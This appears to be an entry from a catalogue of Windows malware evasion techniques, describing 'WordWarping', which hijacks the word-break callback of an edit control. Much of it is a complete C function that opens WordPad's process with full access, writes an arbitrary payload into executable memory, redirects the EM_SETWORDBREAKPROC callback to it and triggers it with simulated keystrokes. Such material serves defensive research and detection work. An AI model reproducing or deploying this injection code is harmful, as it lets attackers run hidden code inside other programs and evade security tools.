WordWarping

Created the Tuesday 13 October 2020. Updated 4 weeks ago.

Edit controls are a type of user interface element that allows a user to enter and edit text in a graphical user interface (GUI). They are commonly used in Windows applications and can be embedded directly into a GUI or subclassed as a separate window. Edit controls can be set to display text in multiline mode, in which case they use a special callback function called the EditWordBreakProc to handle word wrapping.

The EditWordBreakProc callback function is called anytime the control needs to perform an operation related to word wrapping. This function can be modified for any window by sending the EM_SETWORDBREAKPROC message to the window. If the window is an edit control or a descendant of an edit control, modifying the EditWordBreakProc callback function can cause unexpected behavior.

One way to trigger the execution of the EditWordBreakProc callback function is to simulate keyboard input using the SendInput or PostMessage APIs. These APIs allow a program to send input events, such as keystrokes or mouse movements, to a window or application as if they were being generated by a user. If the input events are directed at an edit control or a descendant of an edit control, they may cause the EditWordBreakProc callback function to be called.

Technique Identifier

U1204

Technique Tags

Rich Edit controls Windows controls Multiline mode EditWordBreakProc callback function Word wrapping EM_SETWORDBREAKPROC message

Code Snippets

VOID wordwarping(LPVOID payload, DWORD payloadSize) {
    HANDLE        hp;
    DWORD         id;
    HWND          wpw, rew;
    LPVOID        cs, wwf;
    SIZE_T        rd, wr;
    INPUT         ip;
    
    // 1. Get main window for wordpad.
    //    This will accept simulated keyboard input.
    wpw = FindWindow(L"WordPadClass", NULL);
    
    // 2. Find the rich edit control for wordpad.
    rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);

    // 3. Try get current address of Wordwrap function
    wwf = (LPVOID)SendMessage(rew, EM_GETWORDBREAKPROC, 0, 0);

    // 4. Obtain the process id for wordpad.
    GetWindowThreadProcessId(rew, &id);

    // 5. Try open the process.
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

    // 6. Allocate RWX memory for the payload.
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // 7. Write the payload to memory
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);

    // 8. Update the callback procedure
    SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)cs);

    // 9. Simulate keyboard input to trigger payload
    ip.type           = INPUT_KEYBOARD;
    ip.ki.wVk         = 'A';
    ip.ki.wScan       = 0;
    ip.ki.dwFlags     = 0;
    ip.ki.time        = 0;
    ip.ki.dwExtraInfo = 0;
    
    SetForegroundWindow(rew);
    SendInput(1, &ip, sizeof(ip));

    // 10. Restore original Wordwrap function (if any)
    SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)wwf);
    
    // 11. Free memory and close process handle
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/ http://www.hexacorn.com/blog/2019/04/23/wordwarper-new-code-injection-trick/